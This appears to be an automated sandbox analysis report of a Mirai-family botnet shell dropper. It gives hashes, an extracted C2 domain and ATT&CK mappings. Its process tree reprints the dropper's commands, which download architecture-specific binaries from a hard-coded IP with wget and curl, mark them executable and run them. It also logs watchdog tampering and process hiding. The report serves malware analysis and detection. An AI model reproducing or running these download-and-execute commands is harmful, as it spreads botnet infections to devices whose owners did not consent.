Analysis
-
max time kernel
146s -
max time network
153s -
platform
debian-9_armhf -
resource
debian9-armhf-20240611-en -
resource tags
arch:armhfimage:debian9-armhf-20240611-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem -
submitted
18-12-2024 02:08
Static task
static1
Behavioral task
behavioral1
Sample
0e6380d32502ec32658a9bd06ee6162eb5f519fefc44ab78047f624eed3b6689.sh
Resource
ubuntu1804-amd64-20240729-en
Behavioral task
behavioral2
Sample
0e6380d32502ec32658a9bd06ee6162eb5f519fefc44ab78047f624eed3b6689.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
0e6380d32502ec32658a9bd06ee6162eb5f519fefc44ab78047f624eed3b6689.sh
Resource
debian9-mipsbe-20240418-en
Behavioral task
behavioral4
Sample
0e6380d32502ec32658a9bd06ee6162eb5f519fefc44ab78047f624eed3b6689.sh
Resource
debian9-mipsel-20240611-en
General
-
Target
0e6380d32502ec32658a9bd06ee6162eb5f519fefc44ab78047f624eed3b6689.sh
-
Size
2KB
-
MD5
c2d1389e84451b69803d505ce0293f61
-
SHA1
6625185014b47c560c6059209c06de1e299fcb16
-
SHA256
0e6380d32502ec32658a9bd06ee6162eb5f519fefc44ab78047f624eed3b6689
-
SHA512
349a95586f606270c528700f2cd615a667cb48b498fa53221f05e3c46bcf8616942b617591548b6091c24d7fb949f1904c536f6d7f14071cfa9ec3897522adc5
Malware Config
Extracted
mirai
UNSTABLE
servers.vlrt-gap.com
Extracted
mirai
UNSTABLE
Extracted
mirai
UNSTABLE
servers.vlrt-gap.com
Signatures
-
Mirai family
-
File and Directory Permissions Modification 1 TTPs 13 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 798 chmod 810 chmod 816 chmod 823 chmod 829 chmod 695 chmod 717 chmod 740 chmod 751 chmod 767 chmod 789 chmod 804 chmod 678 chmod -
Deletes itself 2 IoCs
pid Process 741 WTH 790 WTH -
Executes dropped EXE 13 IoCs
ioc pid Process /tmp/WTH 679 WTH /tmp/WTH 696 WTH /tmp/WTH 719 WTH /tmp/WTH 741 WTH /tmp/WTH 752 WTH /tmp/WTH 768 WTH /tmp/WTH 790 WTH /tmp/WTH 799 WTH /tmp/WTH 805 WTH /tmp/WTH 811 WTH /tmp/WTH 818 WTH /tmp/WTH 824 WTH /tmp/WTH 830 WTH -
Modifies Watchdog functionality 1 TTPs 4 IoCs
Malware like Mirai modifies the Watchdog to prevent it restarting an infected system.
description ioc Process File opened for modification /dev/watchdog WTH File opened for modification /dev/misc/watchdog WTH File opened for modification /dev/watchdog WTH File opened for modification /dev/misc/watchdog WTH -
Enumerates active TCP sockets 1 TTPs 1 IoCs
Gets active TCP sockets from /proc virtual filesystem.
description ioc Process File opened for reading /proc/net/tcp WTH -
Writes file to system bin folder 4 IoCs
description ioc Process File opened for modification /bin/watchdog WTH File opened for modification /sbin/watchdog WTH File opened for modification /bin/watchdog WTH File opened for modification /sbin/watchdog WTH -
Changes its process name 2 IoCs
description ioc pid Process Changes the process name, possibly in an attempt to hide itself 7mu0k8k3j4rvecw6 741 WTH Changes the process name, possibly in an attempt to hide itself 1lesrr3ttd50m40m 790 WTH -
Checks CPU configuration 1 TTPs 13 IoCs
Checks CPU information which indicate if the system is a virtual machine.
description ioc Process File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl -
Reads system network configuration 1 TTPs 1 IoCs
Uses contents of /proc filesystem to enumerate network settings.
description ioc Process File opened for reading /proc/net/tcp WTH -
description ioc Process File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl -
System Network Configuration Discovery 1 TTPs 3 IoCs
Adversaries may gather information about the network configuration of a system.
pid Process 682 wget 685 curl 694 cat -
Writes file to tmp directory 25 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/WTH 0e6380d32502ec32658a9bd06ee6162eb5f519fefc44ab78047f624eed3b6689.sh File opened for modification /tmp/zmap.mpsl wget File opened for modification /tmp/zmap.mpsl curl File opened for modification /tmp/zmap.arm wget File opened for modification /tmp/zmap.ppc wget File opened for modification /tmp/zmap.ppc curl File opened for modification /tmp/zmap.m68k curl File opened for modification /tmp/zmap.sh4 wget File opened for modification /tmp/zmap.arc curl File opened for modification /tmp/zmap.x86 curl File opened for modification /tmp/zmap.mips curl File opened for modification /tmp/zmap.arm6 wget File opened for modification /tmp/zmap.sh4 curl File opened for modification /tmp/zmap.mips wget File opened for modification /tmp/zmap.arm curl File opened for modification /tmp/zmap.arm5 curl File opened for modification /tmp/zmap.arm7 wget File opened for modification /tmp/zmap.arm7 curl File opened for modification /tmp/zmap.spc curl File opened for modification /tmp/zmap.i686 curl File opened for modification /tmp/zmap.x86 wget File opened for modification /tmp/zmap.arm5 wget File opened for modification /tmp/zmap.arm6 curl File opened for modification /tmp/zmap.m68k wget File opened for modification /tmp/zmap.spc wget
Processes
-
/tmp/0e6380d32502ec32658a9bd06ee6162eb5f519fefc44ab78047f624eed3b6689.sh/tmp/0e6380d32502ec32658a9bd06ee6162eb5f519fefc44ab78047f624eed3b6689.sh1⤵
- Writes file to tmp directory
PID:648 -
/usr/bin/wgetwget http://185.196.11.47/zmap.x862⤵
- Writes file to tmp directory
PID:650
-
-
/usr/bin/curlcurl -O http://185.196.11.47/zmap.x862⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:667
-
-
/bin/catcat zmap.x862⤵PID:677
-
-
/bin/chmodchmod +x 0e6380d32502ec32658a9bd06ee6162eb5f519fefc44ab78047f624eed3b6689.sh systemd-private-451f5880870a4cb6bcf9ecbd9849d1d3-systemd-timedated.service-W2619L WTH zmap.x862⤵
- File and Directory Permissions Modification
PID:678
-
-
/tmp/WTH./WTH zte.selfrep2⤵
- Executes dropped EXE
PID:679
-
-
/usr/bin/wgetwget http://185.196.11.47/zmap.mips2⤵
- System Network Configuration Discovery
- Writes file to tmp directory
PID:682
-
-
/usr/bin/curlcurl -O http://185.196.11.47/zmap.mips2⤵
- Checks CPU configuration
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:685
-
-
/bin/catcat zmap.mips2⤵
- System Network Configuration Discovery
PID:694
-
-
/bin/chmodchmod +x 0e6380d32502ec32658a9bd06ee6162eb5f519fefc44ab78047f624eed3b6689.sh systemd-private-451f5880870a4cb6bcf9ecbd9849d1d3-systemd-timedated.service-W2619L WTH zmap.mips zmap.x862⤵
- File and Directory Permissions Modification
PID:695
-
-
/tmp/WTH./WTH zte.selfrep2⤵
- Executes dropped EXE
PID:696
-
-
/usr/bin/wgetwget http://185.196.11.47/zmap.mpsl2⤵
- Writes file to tmp directory
PID:699
-
-
/usr/bin/curlcurl -O http://185.196.11.47/zmap.mpsl2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:707
-
-
/bin/catcat zmap.mpsl2⤵PID:716
-
-
/bin/chmodchmod +x 0e6380d32502ec32658a9bd06ee6162eb5f519fefc44ab78047f624eed3b6689.sh systemd-private-451f5880870a4cb6bcf9ecbd9849d1d3-systemd-timedated.service-W2619L WTH zmap.mips zmap.mpsl zmap.x862⤵
- File and Directory Permissions Modification
PID:717
-
-
/tmp/WTH./WTH zte.selfrep2⤵
- Executes dropped EXE
PID:719
-
-
/usr/bin/wgetwget http://185.196.11.47/zmap.arm2⤵
- Writes file to tmp directory
PID:721
-
-
/usr/bin/curlcurl -O http://185.196.11.47/zmap.arm2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:728
-
-
/bin/catcat zmap.arm2⤵PID:738
-
-
/bin/chmodchmod +x 0e6380d32502ec32658a9bd06ee6162eb5f519fefc44ab78047f624eed3b6689.sh systemd-private-451f5880870a4cb6bcf9ecbd9849d1d3-systemd-timedated.service-W2619L WTH zmap.arm zmap.mips zmap.mpsl zmap.x862⤵
- File and Directory Permissions Modification
PID:740
-
-
/tmp/WTH./WTH zte.selfrep2⤵
- Deletes itself
- Executes dropped EXE
- Modifies Watchdog functionality
- Writes file to system bin folder
- Changes its process name
PID:741
-
-
/usr/bin/wgetwget http://185.196.11.47/zmap.arm52⤵
- Writes file to tmp directory
PID:744
-
-
/usr/bin/curlcurl -O http://185.196.11.47/zmap.arm52⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:749
-
-
/bin/catcat zmap.arm52⤵PID:750
-
-
/bin/chmodchmod +x 0e6380d32502ec32658a9bd06ee6162eb5f519fefc44ab78047f624eed3b6689.sh systemd-private-451f5880870a4cb6bcf9ecbd9849d1d3-systemd-timedated.service-W2619L WTH zmap.arm zmap.arm5 zmap.mips zmap.mpsl zmap.x862⤵
- File and Directory Permissions Modification
PID:751
-
-
/tmp/WTH./WTH zte.selfrep2⤵
- Executes dropped EXE
PID:752
-
-
/usr/bin/wgetwget http://185.196.11.47/zmap.arm62⤵
- Writes file to tmp directory
PID:753
-
-
/usr/bin/curlcurl -O http://185.196.11.47/zmap.arm62⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:756
-
-
/bin/catcat zmap.arm62⤵PID:765
-
-
/bin/chmodchmod +x 0e6380d32502ec32658a9bd06ee6162eb5f519fefc44ab78047f624eed3b6689.sh systemd-private-451f5880870a4cb6bcf9ecbd9849d1d3-systemd-timedated.service-W2619L WTH zmap.arm zmap.arm5 zmap.arm6 zmap.mips zmap.mpsl zmap.x862⤵
- File and Directory Permissions Modification
PID:767
-
-
/tmp/WTH./WTH zte.selfrep2⤵
- Executes dropped EXE
PID:768
-
-
/usr/bin/wgetwget http://185.196.11.47/zmap.arm72⤵
- Writes file to tmp directory
PID:770
-
-
/usr/bin/curlcurl -O http://185.196.11.47/zmap.arm72⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:778
-
-
/bin/catcat zmap.arm72⤵PID:787
-
-
/bin/chmodchmod +x 0e6380d32502ec32658a9bd06ee6162eb5f519fefc44ab78047f624eed3b6689.sh systemd-private-451f5880870a4cb6bcf9ecbd9849d1d3-systemd-timedated.service-W2619L WTH zmap.arm zmap.arm5 zmap.arm6 zmap.arm7 zmap.mips zmap.mpsl zmap.x862⤵
- File and Directory Permissions Modification
PID:789
-
-
/tmp/WTH./WTH zte.selfrep2⤵
- Deletes itself
- Executes dropped EXE
- Modifies Watchdog functionality
- Enumerates active TCP sockets
- Writes file to system bin folder
- Changes its process name
- Reads system network configuration
PID:790
-
-
/usr/bin/wgetwget http://185.196.11.47/zmap.ppc2⤵
- Writes file to tmp directory
PID:794
-
-
/usr/bin/curlcurl -O http://185.196.11.47/zmap.ppc2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:796
-
-
/bin/catcat zmap.ppc2⤵PID:797
-
-
/bin/chmodchmod +x 0e6380d32502ec32658a9bd06ee6162eb5f519fefc44ab78047f624eed3b6689.sh systemd-private-451f5880870a4cb6bcf9ecbd9849d1d3-systemd-timedated.service-W2619L WTH zmap.arm zmap.arm5 zmap.arm6 zmap.arm7 zmap.mips zmap.mpsl zmap.ppc zmap.x862⤵
- File and Directory Permissions Modification
PID:798
-
-
/tmp/WTH./WTH zte.selfrep2⤵
- Executes dropped EXE
PID:799
-
-
/usr/bin/wgetwget http://185.196.11.47/zmap.m68k2⤵
- Writes file to tmp directory
PID:801
-
-
/usr/bin/curlcurl -O http://185.196.11.47/zmap.m68k2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:802
-
-
/bin/catcat zmap.m68k2⤵PID:803
-
-
/bin/chmodchmod +x 0e6380d32502ec32658a9bd06ee6162eb5f519fefc44ab78047f624eed3b6689.sh systemd-private-451f5880870a4cb6bcf9ecbd9849d1d3-systemd-timedated.service-W2619L WTH zmap.arm zmap.arm5 zmap.arm6 zmap.arm7 zmap.m68k zmap.mips zmap.mpsl zmap.ppc zmap.x862⤵
- File and Directory Permissions Modification
PID:804
-
-
/tmp/WTH./WTH zte.selfrep2⤵
- Executes dropped EXE
PID:805
-
-
/usr/bin/wgetwget http://185.196.11.47/zmap.spc2⤵
- Writes file to tmp directory
PID:807
-
-
/usr/bin/curlcurl -O http://185.196.11.47/zmap.spc2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:808
-
-
/bin/catcat zmap.spc2⤵PID:809
-
-
/bin/chmodchmod +x 0e6380d32502ec32658a9bd06ee6162eb5f519fefc44ab78047f624eed3b6689.sh systemd-private-451f5880870a4cb6bcf9ecbd9849d1d3-systemd-timedated.service-W2619L WTH zmap.arm zmap.arm5 zmap.arm6 zmap.arm7 zmap.m68k zmap.mips zmap.mpsl zmap.ppc zmap.spc zmap.x862⤵
- File and Directory Permissions Modification
PID:810
-
-
/tmp/WTH./WTH zte.selfrep2⤵
- Executes dropped EXE
PID:811
-
-
/usr/bin/wgetwget http://185.196.11.47/zmap.i6862⤵PID:813
-
-
/usr/bin/curlcurl -O http://185.196.11.47/zmap.i6862⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:814
-
-
/bin/catcat zmap.i6862⤵PID:815
-
-
/bin/chmodchmod +x 0e6380d32502ec32658a9bd06ee6162eb5f519fefc44ab78047f624eed3b6689.sh systemd-private-451f5880870a4cb6bcf9ecbd9849d1d3-systemd-timedated.service-W2619L WTH zmap.arm zmap.arm5 zmap.arm6 zmap.arm7 zmap.i686 zmap.m68k zmap.mips zmap.mpsl zmap.ppc zmap.spc zmap.x862⤵
- File and Directory Permissions Modification
PID:816
-
-
/tmp/WTH./WTH zte.selfrep2⤵
- Executes dropped EXE
PID:818
-
-
/usr/bin/wgetwget http://185.196.11.47/zmap.sh42⤵
- Writes file to tmp directory
PID:819
-
-
/usr/bin/curlcurl -O http://185.196.11.47/zmap.sh42⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:821
-
-
/bin/catcat zmap.sh42⤵PID:822
-
-
/bin/chmodchmod +x 0e6380d32502ec32658a9bd06ee6162eb5f519fefc44ab78047f624eed3b6689.sh systemd-private-451f5880870a4cb6bcf9ecbd9849d1d3-systemd-timedated.service-W2619L WTH zmap.arm zmap.arm5 zmap.arm6 zmap.arm7 zmap.i686 zmap.m68k zmap.mips zmap.mpsl zmap.ppc zmap.sh4 zmap.spc zmap.x862⤵
- File and Directory Permissions Modification
PID:823
-
-
/tmp/WTH./WTH zte.selfrep2⤵
- Executes dropped EXE
PID:824
-
-
/usr/bin/wgetwget http://185.196.11.47/zmap.arc2⤵PID:826
-
-
/usr/bin/curlcurl -O http://185.196.11.47/zmap.arc2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:827
-
-
/bin/catcat zmap.arc2⤵PID:828
-
-
/bin/chmodchmod +x 0e6380d32502ec32658a9bd06ee6162eb5f519fefc44ab78047f624eed3b6689.sh systemd-private-451f5880870a4cb6bcf9ecbd9849d1d3-systemd-timedated.service-W2619L WTH zmap.arc zmap.arm zmap.arm5 zmap.arm6 zmap.arm7 zmap.i686 zmap.m68k zmap.mips zmap.mpsl zmap.ppc zmap.sh4 zmap.spc zmap.x862⤵
- File and Directory Permissions Modification
PID:829
-
-
/tmp/WTH./WTH zte.selfrep2⤵
- Executes dropped EXE
PID:830
-
Network
MITRE ATT&CK Enterprise v15
Defense Evasion
File and Directory Permissions Modification
1Linux and Mac File and Directory Permissions Modification
1Impair Defenses
1Virtualization/Sandbox Evasion
1System Checks
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
94KB
MD58ae4ac18a3b34fba963f59a42ff02fb7
SHA1e9f75cf21972b2c953163d64d3cb89bd6a93cc1b
SHA256c485a846f4b7c5d410762291758175ca0775ca919da52ef05047f3000045020a
SHA512af6a9fb41fc94fdb3c1448e2477190f403b14eca2502e93c1ab6a1c8cf0eaada47dedd81df94f15bc6efa8ae29d68f3a6368c67283514c88f3f8e28519bf6bb0
-
Filesize
94KB
MD5d81e9564b8b9d62d70bda936d927d875
SHA142706a08b0545984ed5a5cfbdff3fe2ab62ca552
SHA256c14fead55aee69ec760fdba5f5371922595ad9df3c7201feb088f322043def0d
SHA512282a8641c62e67b1bde30e1bfbd991493c38155b6dfdb5406a80d69b7b710bfe27fdbe5571363c3f55e2fbb0a447db3789c5609493e24daef3260c2d87417886
-
Filesize
74KB
MD59784e8db8dae548a6593644e3a168579
SHA1afa7c4ce4b0122ec5f22dc37aa7658f41cb01008
SHA2564278fcf8ef5692822cc5eccce4857b5132f8d029949b83925a7a1e6f5c969129
SHA5127f48ae6e910f87f70995c6373083c534670e2f66310e51e8a0b43bc01a31327e33a992b3ad50bc4956e4c9fb3c0845e6ca6aca2dbb014e66487a8338efe2eb6c
-
Filesize
49KB
MD5241482e2337afd65af97770b37d5c90d
SHA1c52137309238b4f1badf1e7bf01197bc48cd00fc
SHA25601d39c861837c2f70e59a1e0af94249269813cfa8dc2696d095d36db84fcf7ca
SHA512cf3fbd84e7664d26a5cdbec8fb195d28438aca00c62b3428fd6d4c4ab7cb781d5816afa6eb046def918efc73059192683ba313c06fec2231cc6cff8610d29a00
-
Filesize
152KB
MD5f51e09e21e26b88091e5817482391af9
SHA135ac89537e69e933a9412877638edd2ddaf48195
SHA256ff15bf021c5804b34110ecab8a8c86dd399c60b246cb626f536a000b26b27e96
SHA51213a46b95db2323015267dd034bde6b2517ea447d091ba7b702aa249ea7172d876156554387b9a5640490b97217f48f843b28f00f65fdc45948a93fbbdb5dd1c3
-
Filesize
61KB
MD5d1f752879420a6d45d76f130281392d6
SHA146a92c0efae33b8a826dc48daa3dbf3d30be4a15
SHA2564fc42ee2d91d577e0bcc49c27d5f3936584ad49c27b5032baa57a6c6e53b4914
SHA51291e7beb1157bf75f4e73459eb2ab003005aa591848698451ee6dc79764570bf2d8a253c25dda6346b657367844048cd21be38b6485d169e373e8455b2d586225